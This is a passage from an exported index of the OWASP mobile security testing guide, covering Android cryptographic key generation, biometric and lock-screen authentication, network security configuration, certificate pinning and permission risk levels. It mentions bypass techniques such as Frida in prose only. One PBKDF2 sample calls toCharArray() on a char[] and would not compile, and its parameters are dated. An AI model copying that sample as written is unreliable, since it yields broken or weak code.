"},{"location":"MASTG/Android/0x05e-Testing-Cryptography/#key-generation","title":"Key Generation","text":"The Android SDK allows you to specify how a key should be generated, and under which circumstances it can be used. Android 6.0 (API level 23) introduced the KeyGenParameterSpec
class that can be used to ensure the correct key usage in the application. For example:
String keyAlias = \"MySecretKey\";\n\nKeyGenParameterSpec keyGenParameterSpec = new KeyGenParameterSpec.Builder(keyAlias,\n KeyProperties.PURPOSE_ENCRYPT | KeyProperties.PURPOSE_DECRYPT)\n .setBlockModes(KeyProperties.BLOCK_MODE_CBC)\n .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_PKCS7)\n .setRandomizedEncryptionRequired(true)\n .build();\n\nKeyGenerator keyGenerator = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES,\n \"AndroidKeyStore\");\nkeyGenerator.init(keyGenParameterSpec);\n\nSecretKey secretKey = keyGenerator.generateKey();\n
The KeyGenParameterSpec
indicates that the key can be used for encryption and decryption, but not for other purposes, such as signing or verifying. It further specifies the block mode (CBC), padding (PKCS #7), and explicitly specifies that randomized encryption is required (this is the default). Next, we enter AndroidKeyStore
as the name of the provider in the KeyGenerator.getInstance
call to ensure that the keys are stored in the Android KeyStore.
GCM is another AES block mode that provides additional security benefits over other, older modes. In addition to being cryptographically more secure, it also provides authentication. When using CBC (and other modes), authentication would need to be performed separately, using HMACs (see the \"Tampering and Reverse Engineering on Android\" chapter). Note that GCM is the only mode of AES that does not support padding.
Attempting to use the generated key in violation of the above spec would result in a security exception.
Here's an example of using that key to encrypt:
String AES_MODE = KeyProperties.KEY_ALGORITHM_AES\n + \"/\" + KeyProperties.BLOCK_MODE_CBC\n + \"/\" + KeyProperties.ENCRYPTION_PADDING_PKCS7;\nKeyStore AndroidKeyStore = AndroidKeyStore.getInstance(\"AndroidKeyStore\");\n\n// byte[] input\nKey key = AndroidKeyStore.getKey(keyAlias, null);\n\nCipher cipher = Cipher.getInstance(AES_MODE);\ncipher.init(Cipher.ENCRYPT_MODE, key);\n\nbyte[] encryptedBytes = cipher.doFinal(input);\nbyte[] iv = cipher.getIV();\n// save both the IV and the encryptedBytes\n
Both the IV (initialization vector) and the encrypted bytes need to be stored; otherwise decryption is not possible.
Here's how that cipher text would be decrypted. The input
is the encrypted byte array and iv
is the initialization vector from the encryption step:
// byte[] input\n// byte[] iv\nKey key = AndroidKeyStore.getKey(AES_KEY_ALIAS, null);\n\nCipher cipher = Cipher.getInstance(AES_MODE);\nIvParameterSpec params = new IvParameterSpec(iv);\ncipher.init(Cipher.DECRYPT_MODE, key, params);\n\nbyte[] result = cipher.doFinal(input);\n
Since the IV is randomly generated each time, it should be saved along with the cipher text (encryptedBytes
) in order to decrypt it later.
Prior to Android 6.0 (API level 23), AES key generation was not supported. As a result, many implementations chose to use RSA and generated a public-private key pair for asymmetric encryption using KeyPairGeneratorSpec
or used SecureRandom
to generate AES keys.
Here's an example of KeyPairGenerator
and KeyPairGeneratorSpec
used to create the RSA key pair:
Date startDate = Calendar.getInstance().getTime();\nCalendar endCalendar = Calendar.getInstance();\nendCalendar.add(Calendar.YEAR, 1);\nDate endDate = endCalendar.getTime();\nKeyPairGeneratorSpec keyPairGeneratorSpec = new KeyPairGeneratorSpec.Builder(context)\n .setAlias(RSA_KEY_ALIAS)\n .setKeySize(4096)\n .setSubject(new X500Principal(\"CN=\" + RSA_KEY_ALIAS))\n .setSerialNumber(BigInteger.ONE)\n .setStartDate(startDate)\n .setEndDate(endDate)\n .build();\n\nKeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance(\"RSA\",\n \"AndroidKeyStore\");\nkeyPairGenerator.initialize(keyPairGeneratorSpec);\n\nKeyPair keyPair = keyPairGenerator.generateKeyPair();\n
This sample creates the RSA key pair with a key size of 4096-bit (i.e. modulus size). Elliptic Curve (EC) keys can also be generated in a similar way. However as of Android 11 (API level 30), AndroidKeyStore does not support encryption or decryption with EC keys. They can only be used for signatures.
A symmetric encryption key can be generated from the passphrase by using the Password Based Key Derivation Function version 2 (PBKDF2). This cryptographic protocol is designed to generate cryptographic keys, which can be used for cryptography purpose. Input parameters for the algorithm are adjusted according to weak key generation function section. The code listing below illustrates how to generate a strong encryption key based on a password.
public static SecretKey generateStrongAESKey(char[] password, int keyLength)\n{\n //Initialize objects and variables for later use\n int iterationCount = 10000;\n int saltLength = keyLength / 8;\n SecureRandom random = new SecureRandom();\n //Generate the salt\n byte[] salt = new byte[saltLength];\n random.nextBytes(salt);\n KeySpec keySpec = new PBEKeySpec(password.toCharArray(), salt, iterationCount, keyLength);\n SecretKeyFactory keyFactory = SecretKeyFactory.getInstance(\"PBKDF2WithHmacSHA1\");\n byte[] keyBytes = keyFactory.generateSecret(keySpec).getEncoded();\n return new SecretKeySpec(keyBytes, \"AES\");\n}\n
The above method requires a character array containing the password and the needed key length in bits, for instance a 128 or 256-bit AES key. We define an iteration count of 10,000 rounds which will be used by the PBKDF2 algorithm. Increasing the number of iterations significantly increases the workload for a brute-force attack on the password, however it can affect performance as more computational power is required for key derivation. We define the salt size equal to the key length divided by 8 in order to convert from bits to bytes and we use the SecureRandom
class to randomly generate a salt. The salt needs to be kept constant to ensure the same encryption key is generated time after time for the same supplied password. Note that you can store the salt privately in SharedPreferences
. It is recommended to exclude the salt from the Android backup mechanism to prevent synchronization in case of higher risk data.
Note that if you take a rooted device or a patched (e.g. repackaged) application into account as a threat to the data, it might be better to encrypt the salt with a key that is placed in the AndroidKeystore
. The Password-Based Encryption (PBE) key is generated using the recommended PBKDF2WithHmacSHA1
algorithm, until Android 8.0 (API level 26). For higher API levels, it is best to use PBKDF2withHmacSHA256
, which will end up with a longer hash value.
Note: there is a widespread false believe that the NDK should be used to hide cryptographic operations and hardcoded keys. However, using this mechanism is not effective. Attackers can still use tools to find the mechanism used and make dumps of the key in memory. Next, the control flow can be analyzed with e.g. radare2 and the keys extracted with the help of Frida or the combination of both: r2frida (see sections \"Disassembling Native Code\", \"Memory Dump\" and \"In-Memory Search\" in the chapter \"Tampering and Reverse Engineering on Android\" for more details). From Android 7.0 (API level 24) onward, it is not allowed to use private APIs, instead: public APIs need to be called, which further impacts the effectiveness of hiding it away as described in the Android Developers Blog
"},{"location":"MASTG/Android/0x05e-Testing-Cryptography/#random-number-generation","title":"Random number generation","text":"Cryptography requires secure pseudo random number generation (PRNG). Standard Java classes as java.util.Random
do not provide sufficient randomness and in fact may make it possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive information.
In general, SecureRandom
should be used. However, if the Android versions below Android 4.4 (API level 19) are supported, additional care needs to be taken in order to work around the bug in Android 4.1-4.3 (API level 16-18) versions that failed to properly initialize the PRNG.
Most developers should instantiate SecureRandom
via the default constructor without any arguments. Other constructors are for more advanced uses and, if used incorrectly, can lead to decreased randomness and security. The PRNG provider backing SecureRandom
uses the SHA1PRNG
from AndroidOpenSSL
(Conscrypt) provider.
During local authentication, an app authenticates the user against credentials stored locally on the device. In other words, the user \"unlocks\" the app or some inner layer of functionality by providing a valid PIN, password or biometric characteristics such as face or fingerprint, which is verified by referencing local data. Generally, this is done so that users can more conveniently resume an existing session with a remote service or as a means of step-up authentication to protect some critical function.
As stated before in chapter \"Mobile App Authentication Architectures\": The tester should be aware that local authentication should always be enforced at a remote endpoint or based on a cryptographic primitive. Attackers can easily bypass local authentication if no data returns from the authentication process.
On Android, there are two mechanisms supported by the Android Runtime for local authentication: the Confirm Credential flow and the Biometric Authentication flow.
"},{"location":"MASTG/Android/0x05f-Testing-Local-Authentication/#confirm-credential-flow","title":"Confirm Credential Flow","text":"The confirm credential flow is available since Android 6.0 and is used to ensure that users do not have to enter app-specific passwords together with the lock screen protection. Instead: if a user has logged in to the device recently, then confirm-credentials can be used to unlock cryptographic materials from the AndroidKeystore
. That is, if the user unlocked the device within the set time limits (setUserAuthenticationValidityDurationSeconds
), otherwise the device needs to be unlocked again.
Note that the security of Confirm Credentials is only as strong as the protection set at the lock screen. This often means that simple predictive lock-screen patterns are used and therefore we do not recommend any apps which require L2 of security controls to use Confirm Credentials.
"},{"location":"MASTG/Android/0x05f-Testing-Local-Authentication/#biometric-authentication-flow","title":"Biometric Authentication Flow","text":"Biometric authentication is a convenient mechanism for authentication, but also introduces an additional attack surface when using it. The Android developer documentation gives an interesting overview and indicators for measuring biometric unlock security.
The Android platform offers three different classes for biometric authentication:
BiometricManager
BiometricPrompt
FingerprintManager
(deprecated in Android 9 (API level 28))The class BiometricManager
can be used to verify if biometric hardware is available on the device and if it's configured by the user. If that's the case, the class BiometricPrompt
can be used to show a system-provided biometric dialog.
The BiometricPrompt
class is a significant improvement, as it allows to have a consistent UI for biometric authentication on Android and also supports more sensors than just fingerprint.
This is different to the FingerprintManager
class which only supports fingerprint sensors and provides no UI, forcing developers to build their own fingerprint UI.
A very detailed overview and explanation of the Biometric API on Android was published on the Android Developer Blog.
"},{"location":"MASTG/Android/0x05f-Testing-Local-Authentication/#fingerprintmanager-deprecated-in-android-9-api-level-28","title":"FingerprintManager (deprecated in Android 9 (API level 28))","text":"Android 6.0 (API level 23) introduced public APIs for authenticating users via fingerprint, but is deprecated in Android 9 (API level 28). Access to the fingerprint hardware is provided through the FingerprintManager
class. An app can request fingerprint authentication by instantiating a FingerprintManager
object and calling its authenticate
method. The caller registers callback methods to handle possible outcomes of the authentication process (i.e. success, failure, or error). Note that this method doesn't constitute strong proof that fingerprint authentication has actually been performed - for example, the authentication step could be patched out by an attacker, or the \"success\" callback could be overloaded using dynamic instrumentation.
You can achieve better security by using the fingerprint API in conjunction with the Android KeyGenerator
class. With this approach, a symmetric key is stored in the Android KeyStore and unlocked with the user's fingerprint. For example, to enable user access to a remote service, an AES key is created which encrypts the authentication token. By calling setUserAuthenticationRequired(true)
when creating the key, it is ensured that the user must re-authenticate to retrieve it. The encrypted authentication token can then be saved directly on the device (e.g. via Shared Preferences). This design is a relatively safe way to ensure the user actually entered an authorized fingerprint.
An even more secure option is using asymmetric cryptography. Here, the mobile app creates an asymmetric key pair in the KeyStore and enrolls the public key on the server backend. Later transactions are then signed with the private key and verified by the server using the public key.
"},{"location":"MASTG/Android/0x05f-Testing-Local-Authentication/#biometric-library","title":"Biometric Library","text":"Android provides a library called Biometric which offers a compatibility version of the BiometricPrompt
and BiometricManager
APIs, as implemented in Android 10, with full feature support back to Android 6.0 (API 23).
You can find a reference implementation and instructions on how to show a biometric authentication dialog in the Android developer documentation.
There are two authenticate
methods available in the BiometricPrompt
class. One of them expects a CryptoObject
, which adds an additional layer of security for the biometric authentication.
The authentication flow would be as follows when using CryptoObject:
setUserAuthenticationRequired
and setInvalidatedByBiometricEnrollment
set to true. Additionally, setUserAuthenticationValidityDurationSeconds
should be set to -1.authenticate
method and the CryptoObject
.If CryptoObject
is not used as part of the authenticate method, it can be bypassed by using Frida. See the \"Dynamic Instrumentation\" section for more details.
Developers can use several validation classes offered by Android to test the implementation of biometric authentication in their app.
"},{"location":"MASTG/Android/0x05f-Testing-Local-Authentication/#fingerprintmanager","title":"FingerprintManager","text":"This section describes how to implement biometric authentication by using the FingerprintManager
class. Please keep in mind that this class is deprecated and the Biometric library should be used instead as a best practice. This section is just for reference, in case you come across such an implementation and need to analyze it.
Begin by searching for FingerprintManager.authenticate
calls. The first parameter passed to this method should be a CryptoObject
instance which is a wrapper class for crypto objects supported by FingerprintManager. Should the parameter be set to null
, this means the fingerprint authorization is purely event-bound, likely creating a security issue.
The creation of the key used to initialize the cipher wrapper can be traced back to the CryptoObject
. Verify the key was both created using the KeyGenerator
class in addition to setUserAuthenticationRequired(true)
being called during creation of the KeyGenParameterSpec
object (see code samples below).
Make sure to verify the authentication logic. For the authentication to be successful, the remote endpoint must require the client to present the secret retrieved from the KeyStore, a value derived from the secret, or a value signed with the client private key (see above).
Safely implementing fingerprint authentication requires following a few simple principles, starting by first checking if that type of authentication is even available. On the most basic front, the device must run Android 6.0 or higher (API 23+). Four other prerequisites must also be verified:
The permission must be requested in the Android Manifest:
<uses-permission\n android:name=\"android.permission.USE_FINGERPRINT\" />\n
Fingerprint hardware must be available:
FingerprintManager fingerprintManager = (FingerprintManager)\n context.getSystemService(Context.FINGERPRINT_SERVICE);\nfingerprintManager.isHardwareDetected();\n
The user must have a protected lock screen:
KeyguardManager keyguardManager = (KeyguardManager) context.getSystemService(Context.KEYGUARD_SERVICE);\nkeyguardManager.isKeyguardSecure(); //note if this is not the case: ask the user to setup a protected lock screen\n
At least one finger should be registered:
fingerprintManager.hasEnrolledFingerprints();\n
The application should have permission to ask for a user fingerprint:
context.checkSelfPermission(Manifest.permission.USE_FINGERPRINT) == PermissionResult.PERMISSION_GRANTED;\n
If any of the above checks fail, the option for fingerprint authentication should not be offered.
It is important to remember that not every Android device offers hardware-backed key storage. The KeyInfo
class can be used to find out whether the key resides inside secure hardware such as a Trusted Execution Environment (TEE) or Secure Element (SE).
SecretKeyFactory factory = SecretKeyFactory.getInstance(getEncryptionKey().getAlgorithm(), ANDROID_KEYSTORE);\nKeyInfo secetkeyInfo = (KeyInfo) factory.getKeySpec(yourencryptionkeyhere, KeyInfo.class);\nsecetkeyInfo.isInsideSecureHardware()\n
On certain systems, it is possible to enforce the policy for biometric authentication through hardware as well. This is checked by:
keyInfo.isUserAuthenticationRequirementEnforcedBySecureHardware();\n
The following describes how to do fingerprint authentication using a symmetric key pair.
Fingerprint authentication may be implemented by creating a new AES key using the KeyGenerator
class by adding setUserAuthenticationRequired(true)
in KeyGenParameterSpec.Builder
.
generator = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES, KEYSTORE);\n\ngenerator.init(new KeyGenParameterSpec.Builder (KEY_ALIAS,\n KeyProperties.PURPOSE_ENCRYPT | KeyProperties.PURPOSE_DECRYPT)\n .setBlockModes(KeyProperties.BLOCK_MODE_CBC)\n .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_PKCS7)\n .setUserAuthenticationRequired(true)\n .build()\n);\n\ngenerator.generateKey();\n
To perform encryption or decryption with the protected key, create a Cipher
object and initialize it with the key alias.
SecretKey keyspec = (SecretKey)keyStore.getKey(KEY_ALIAS, null);\n\nif (mode == Cipher.ENCRYPT_MODE) {\n cipher.init(mode, keyspec);\n
Keep in mind, a new key cannot be used immediately - it has to be authenticated through the FingerprintManager
first. This involves wrapping the Cipher
object into FingerprintManager.CryptoObject
which is passed to FingerprintManager.authenticate
before it will be recognized.
cryptoObject = new FingerprintManager.CryptoObject(cipher);\nfingerprintManager.authenticate(cryptoObject, new CancellationSignal(), 0, this, null);\n
The callback method onAuthenticationSucceeded(FingerprintManager.AuthenticationResult result)
is called when the authentication succeeds. The authenticated CryptoObject
can then be retrieved from the result.
public void authenticationSucceeded(FingerprintManager.AuthenticationResult result) {\n cipher = result.getCryptoObject().getCipher();\n\n //(... do something with the authenticated cipher object ...)\n}\n
The following describes how to do fingerprint authentication using an asymmetric key pair.
To implement fingerprint authentication using asymmetric cryptography, first create a signing key using the KeyPairGenerator
class, and enroll the public key with the server. You can then authenticate pieces of data by signing them on the client and verifying the signature on the server. A detailed example for authenticating to remote servers using the fingerprint API can be found in the Android Developers Blog.
A key pair is generated as follows:
KeyPairGenerator.getInstance(KeyProperties.KEY_ALGORITHM_EC, \"AndroidKeyStore\");\nkeyPairGenerator.initialize(\n new KeyGenParameterSpec.Builder(MY_KEY,\n KeyProperties.PURPOSE_SIGN)\n .setDigests(KeyProperties.DIGEST_SHA256)\n .setAlgorithmParameterSpec(new ECGenParameterSpec(\"secp256r1\"))\n .setUserAuthenticationRequired(true)\n .build());\nkeyPairGenerator.generateKeyPair();\n
To use the key for signing, you need to instantiate a CryptoObject and authenticate it through FingerprintManager
.
Signature.getInstance(\"SHA256withECDSA\");\nKeyStore keyStore = KeyStore.getInstance(\"AndroidKeyStore\");\nkeyStore.load(null);\nPrivateKey key = (PrivateKey) keyStore.getKey(MY_KEY, null);\nsignature.initSign(key);\nCryptoObject cryptoObject = new FingerprintManager.CryptoObject(signature);\n\nCancellationSignal cancellationSignal = new CancellationSignal();\nFingerprintManager fingerprintManager =\n context.getSystemService(FingerprintManager.class);\nfingerprintManager.authenticate(cryptoObject, cancellationSignal, 0, this, null);\n
You can now sign the contents of a byte array inputBytes
as follows.
Signature signature = cryptoObject.getSignature();\nsignature.update(inputBytes);\nbyte[] signed = signature.sign();\n
Android 7.0 (API level 24) adds the setInvalidatedByBiometricEnrollment(boolean invalidateKey)
method to KeyGenParameterSpec.Builder
. When invalidateKey
value is set to true
(the default), keys that are valid for fingerprint authentication are irreversibly invalidated when a new fingerprint is enrolled. This prevents an attacker from retrieving they key even if they are able to enroll an additional fingerprint.
Android 8.0 (API level 26) adds two additional error codes:
FINGERPRINT_ERROR_LOCKOUT_PERMANENT
: The user has tried too many times to unlock their device using the fingerprint reader.FINGERPRINT_ERROR_VENDOR
: A vendor-specific fingerprint reader error occurred.Reassure that the lock screen is set:
KeyguardManager mKeyguardManager = (KeyguardManager) getSystemService(Context.KEYGUARD_SERVICE);\nif (!mKeyguardManager.isKeyguardSecure()) {\n // Show a message that the user hasn't set up a lock screen.\n}\n
Create the key protected by the lock screen. In order to use this key, the user needs to have unlocked the device in the last X seconds, or the device needs to be unlocked again. Make sure that this timeout is not too long, as it becomes harder to ensure that it was the same user using the app as the user unlocking the device:
try {\n KeyStore keyStore = KeyStore.getInstance(\"AndroidKeyStore\");\n keyStore.load(null);\n KeyGenerator keyGenerator = KeyGenerator.getInstance(\n KeyProperties.KEY_ALGORITHM_AES, \"AndroidKeyStore\");\n\n // Set the alias of the entry in Android KeyStore where the key will appear\n // and the constrains (purposes) in the constructor of the Builder\n keyGenerator.init(new KeyGenParameterSpec.Builder(KEY_NAME,\n KeyProperties.PURPOSE_ENCRYPT | KeyProperties.PURPOSE_DECRYPT)\n .setBlockModes(KeyProperties.BLOCK_MODE_CBC)\n .setUserAuthenticationRequired(true)\n // Require that the user has unlocked in the last 30 seconds\n .setUserAuthenticationValidityDurationSeconds(30)\n .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_PKCS7)\n .build());\n keyGenerator.generateKey();\n} catch (NoSuchAlgorithmException | NoSuchProviderException\n | InvalidAlgorithmParameterException | KeyStoreException\n | CertificateException | IOException e) {\n throw new RuntimeException(\"Failed to create a symmetric key\", e);\n}\n
Set up the lock screen to confirm:
private static final int REQUEST_CODE_CONFIRM_DEVICE_CREDENTIALS = 1; //used as a number to verify whether this is where the activity results from\nIntent intent = mKeyguardManager.createConfirmDeviceCredentialIntent(null, null);\nif (intent != null) {\n startActivityForResult(intent, REQUEST_CODE_CONFIRM_DEVICE_CREDENTIALS);\n}\n
Use the key after lock screen:
@Override\nprotected void onActivityResult(int requestCode, int resultCode, Intent data) {\n if (requestCode == REQUEST_CODE_CONFIRM_DEVICE_CREDENTIALS) {\n // Challenge completed, proceed with using cipher\n if (resultCode == RESULT_OK) {\n //use the key for the actual authentication flow\n } else {\n // The user canceled or didn\u2019t complete the lock screen\n // operation. Go to error/cancellation flow.\n }\n }\n}\n
Make sure that fingerprint authentication and/or other types of biometric authentication are exclusively based on the Android SDK and its APIs. If this is not the case, ensure that the alternative SDK has been properly vetted for any weaknesses. Make sure that the SDK is backed by the TEE/SE which unlocks a (cryptographic) secret based on the biometric authentication. This secret should not be unlocked by anything else, but a valid biometric entry. That way, it should never be the case that the fingerprint logic can be bypassed.
"},{"location":"MASTG/Android/0x05g-Testing-Network-Communication/","title":"Android Network Communication","text":""},{"location":"MASTG/Android/0x05g-Testing-Network-Communication/#overview","title":"Overview","text":"Almost every Android app acts as a client to one or more remote services. As this network communication usually takes place over untrusted networks such as public Wi-Fi, classical network based-attacks become a potential issue.
Most modern mobile apps use variants of HTTP-based web services, as these protocols are well-documented and supported.
"},{"location":"MASTG/Android/0x05g-Testing-Network-Communication/#android-network-security-configuration","title":"Android Network Security Configuration","text":"Starting on Android 7.0 (API level 24), Android apps can customize their network security settings using the so-called Network Security Configuration feature which offers the following key capabilities:
If an app defines a custom Network Security Configuration, you can obtain its location by searching for android:networkSecurityConfig
in the AndroidManifest.xml file.
<application android:networkSecurityConfig=\"@xml/network_security_config\"\n
In this case the file is located at @xml
(equivalent to /res/xml) and has the name \"network_security_config\" (which might vary). You should be able to find it as \"res/xml/network_security_config.xml\". If a configuration exists, the following event should be visible in the system logs:
D/NetworkSecurityConfig: Using Network Security Config from resource network_security_config\n
The Network Security Configuration is XML-based and can be used to configure app-wide and domain-specific settings:
base-config
applies to all connections that the app attempts to make.domain-config
overrides base-config
for specific domains (it can contain multiple domain
entries).For example, the following configuration uses the base-config
to prevent cleartext traffic for all domains. But it overrides that rule using a domain-config
, explicitly allowing cleartext traffic for localhost
.
<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<network-security-config>\n <base-config cleartextTrafficPermitted=\"false\" />\n <domain-config cleartextTrafficPermitted=\"true\">\n <domain>localhost</domain>\n </domain-config>\n</network-security-config>\n
Learn more:
The default configuration for apps targeting Android 9 (API level 28) and higher is as follows:
<base-config cleartextTrafficPermitted=\"false\">\n <trust-anchors>\n <certificates src=\"system\" />\n </trust-anchors>\n</base-config>\n
The default configuration for apps targeting Android 7.0 (API level 24) to Android 8.1 (API level 27) is as follows:
<base-config cleartextTrafficPermitted=\"true\">\n <trust-anchors>\n <certificates src=\"system\" />\n </trust-anchors>\n</base-config>\n
The default configuration for apps targeting Android 6.0 (API level 23) and lower is as follows:
<base-config cleartextTrafficPermitted=\"true\">\n <trust-anchors>\n <certificates src=\"system\" />\n <certificates src=\"user\" />\n </trust-anchors>\n</base-config>\n
"},{"location":"MASTG/Android/0x05g-Testing-Network-Communication/#certificate-pinning","title":"Certificate Pinning","text":"The Network Security Configuration can also be used to pin declarative certificates to specific domains. This is done by providing a <pin-set>
in the Network Security Configuration, which is a set of digests (hashes) of the public key (SubjectPublicKeyInfo
) of the corresponding X.509 certificate.
When attempting to establish a connection to a remote endpoint, the system will:
If at least one of the pinned digests matches, the certificate chain will be considered valid and the connection will proceed.
<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<network-security-config>\n <domain-config>\n Use certificate pinning for OWASP website access including sub domains\n <domain includeSubdomains=\"true\">owasp.org</domain>\n <pin-set expiration=\"2018/8/10\">\n <!-- Hash of the public key (SubjectPublicKeyInfo of the X.509 certificate) of\n the Intermediate CA of the OWASP website server certificate -->\n <pin digest=\"SHA-256\">YLh1dUR9y6Kja30RrAn7JKnbQG/uEtLMkBgFF2Fuihg=</pin>\n <!-- Hash of the public key (SubjectPublicKeyInfo of the X.509 certificate) of\n the Root CA of the OWASP website server certificate -->\n <pin digest=\"SHA-256\">Vjs8r4z+80wjNcr1YKepWQboSIRi63WsWXhIMN+eWys=</pin>\n </pin-set>\n </domain-config>\n</network-security-config>\n
"},{"location":"MASTG/Android/0x05g-Testing-Network-Communication/#security-provider","title":"Security Provider","text":"Android relies on a security provider to provide SSL/TLS-based connections. The problem with this kind of security provider (one example is OpenSSL), which comes with the device, is that it often has bugs and/or vulnerabilities.
To avoid known vulnerabilities, developers need to make sure that the application will install a proper security provider. Since July 11, 2016, Google has been rejecting Play Store application submissions (both new applications and updates) that use vulnerable versions of OpenSSL.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/","title":"Android Platform APIs","text":""},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#overview","title":"Overview","text":""},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#app-permissions","title":"App Permissions","text":"Android assigns a distinct system identity (Linux user ID and group ID) to every installed app. Because each Android app operates in a process sandbox, apps must explicitly request access to resources and data that are outside their sandbox. They request this access by declaring the permissions they need to use system data and features. Depending on how sensitive or critical the data or feature is, the Android system will grant the permission automatically or ask the user to approve the request.
To enhance user privacy and mitigate privacy risks, it is crucial for Android apps to minimize permission requests and only request access to sensitive information when absolutely necessary. The Android developer documentation offers valuable insights and best practices to help apps achieve the same level of functionality without requiring direct access to sensitive resources:
Android permissions can be classified into distinct categories depending on the extent of restricted data access and permitted actions that they grant to an app. This classification includes the so-called \"Protection Level\" as shown on the permissions API reference page and AndroidManifest.xml Source Definitions.
normal
. Grants apps access to isolated application-level features with minimal risk to other apps, the user, and the system. Example: android.permission.INTERNET
signature
. Granted only to apps signed with the same certificate as the one used to sign the declaring app. Example: android.permission.ACCESS_MOCK_LOCATION
systemOrSignature
. Reserved for system-embedded apps or those signed with the same certificate as the one used to sign the declaring app. Example: android.permission.ACCESS_DOWNLOAD_MANAGER
. Old synonym for signature|privileged
. Deprecated in API level 23.dangerous
. Grant additional access to restricted data or let the app perform restricted actions that more substantially affect the system and other apps.appop
. Grant access to system resources that are particularly sensitive such as displaying and drawing over other apps or accessing all storage data.normal
, signature
or dangerous
.Independently from the assigned Protection Level, it is important to consider the risk that a permission might be posing considering the additional guarded capabilities, this is especially important for preloaded apps. The following table presents a representative set of Android permissions categorized by associated risk as defined in this paper which leverages the set of (privileged) permissions and entrance points to an app to estimate its attack surface.
Risk Category Permissions Protection Level ASTRONOMICALandroid.permission.INSTALL_PACKAGES
signature CRITICAL android.permission.COPY_PROTECTED_DATA
signature android.permission.WRITE_SECURE_SETTINGS
signature android.permission.READ_FRAME_BUFFER
signature android.permission.MANAGE_CA_CERTIFICATES
signature android.permission.MANAGE_APP_OPS_MODES
signature android.permission.GRANT_RUNTIME_PERMISSIONS
signature android.permission.DUMP
signature android.permission.CAMERA
dangerous android.permission.SYSTEM_CAMERA
systemOrSignature android.permission.MANAGE_PROFILE_AND_DEVICE_OWNERS
signature android.permission.MOUNT_UNMOUNT_FILESYSTEMS
signature HIGH android.permission.INSTALL_GRANT_RUNTIME_PERMISSIONS
signature android.permission.READ_SMS
dangerous android.permission.WRITE_SMS
normal android.permission.RECEIVE_MMS
dangerous android.permission.SEND_SMS_NO_CONFIRMATION
signature android.permission.RECEIVE_SMS
dangerous android.permission.READ_LOGS
signature android.permission.READ_PRIVILEGED_PHONE_STATE
signature android.permission.LOCATION_HARDWARE
signature android.permission.ACCESS_FINE_LOCATION
dangerous android.permission.ACCESS_BACKGROUND_LOCATION
dangerous android.permission.BIND_ACCESSIBILITY_SERVICE
signature android.permission.ACCESS_WIFI_STATE
normal com.android.voicemail.permission.READ_VOICEMAIL
signature android.permission.RECORD_AUDIO
dangerous android.permission.CAPTURE_AUDIO_OUTPUT
signature android.permission.ACCESS_NOTIFICATIONS
signature android.permission.INTERACT_ACROSS_USERS_FULL
signature android.permission.BLUETOOTH_PRIVILEGED
signature android.permission.GET_PASSWORD
signature android.permission.INTERNAL_SYSTEM_WINDOW
signature MEDIUM android.permission.ACCESS_COARSE_LOCATION
dangerous android.permission.CHANGE_COMPONENT_ENABLED_STATE
signature android.permission.READ_CONTACTS
dangerous android.permission.WRITE_CONTACTS
dangerous android.permission.CONNECTIVITY_INTERNAL
signature android.permission.ACCESS_MEDIA_LOCATION
dangerous android.permission.READ_EXTERNAL_STORAGE
dangerous android.permission.WRITE_EXTERNAL_STORAGE
dangerous android.permission.SYSTEM_ALERT_WINDOW
signature android.permission.READ_CALL_LOG
dangerous android.permission.WRITE_CALL_LOG
dangerous android.permission.INTERACT_ACROSS_USERS
signature android.permission.MANAGE_USERS
signature android.permission.READ_CALENDAR
dangerous android.permission.BLUETOOTH_ADMIN
normal android.permission.BODY_SENSORS
dangerous LOW android.permission.DOWNLOAD_WITHOUT_NOTIFICATION
normal android.permission.PACKAGE_USAGE_STATS
signature android.permission.MASTER_CLEAR
signature android.permission.DELETE_PACKAGES
normal android.permission.GET_PACKAGE_SIZE
normal android.permission.BLUETOOTH
normal android.permission.DEVICE_POWER
signature NONE android.permission.ACCESS_NETWORK_STATE
normal android.permission.RECEIVE_BOOT_COMPLETED
normal android.permission.WAKE_LOCK
normal android.permission.FLASHLIGHT
normal android.permission.VIBRATE
normal android.permission.WRITE_MEDIA_STORAGE
signature android.permission.MODIFY_AUDIO_SETTINGS
normal Note that this categorization can change over time. The paper gives us an example of that:
Prior to Android 10, the READ_PHONE_STATE
permission would be classified as HIGH, due to the permanent device identifiers (e.g. (IMEI/MEID, IMSI, SIM, and build serial) that it guards. However, starting from Android 10, a bulk of the sensitive information that can be used for tracking has been moved, refactored or rescoped into a new permission called READ_PRIVILEGED_PHONE_STATE
, putting the new permission in the HIGH category, but resulting in the READ_PHONE_STATE
permission moving to LOW.
Android 8.0 (API level 26) Changes:
The following changes affect all apps running on Android 8.0 (API level 26), even to those apps targeting lower API levels.
READ_CONTACTS
permission, queries for contact's usage data will return approximations rather than exact values (the auto-complete API is not affected by this change).Apps targeting Android 8.0 (API level 26) or higher are affected by the following:
GET_ACCOUNTS
permission granted, unless the authenticator owns the accounts or the user grants that access.PHONE
permissions group:ANSWER_PHONE_CALLS
permission allows to answer incoming phone calls programmatically (via acceptRingingCall
).READ_PHONE_NUMBERS
permission grants read access to the phone numbers stored in the device.Restrictions when granting dangerous permissions: Dangerous permissions are classified into permission groups (e.g. the STORAGE
group contains READ_EXTERNAL_STORAGE
and WRITE_EXTERNAL_STORAGE
). Before Android 8.0 (API level 26), it was sufficient to request one permission of the group in order to get all permissions of that group also granted at the same time. This has changed starting at Android 8.0 (API level 26): whenever an app requests a permission at runtime, the system will grant exclusively that specific permission. However, note that all subsequent requests for permissions in that permission group will be automatically granted without showing the permissions dialog to the user. See this example from the Android developer documentation:
